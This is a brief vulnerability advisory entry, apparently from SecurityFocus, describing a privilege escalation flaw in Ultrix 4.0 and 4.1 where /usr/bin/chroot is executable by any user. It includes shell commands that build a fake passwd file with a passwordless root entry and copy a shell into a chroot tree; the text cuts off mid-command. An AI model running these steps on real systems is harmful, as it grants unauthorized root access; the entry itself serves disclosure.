source: wwwsecurityfocuscom/bid/17/info
By default, /usr/bin/chroot is improperly installed in Ultrix versions 40 and 41 Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges
$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin ...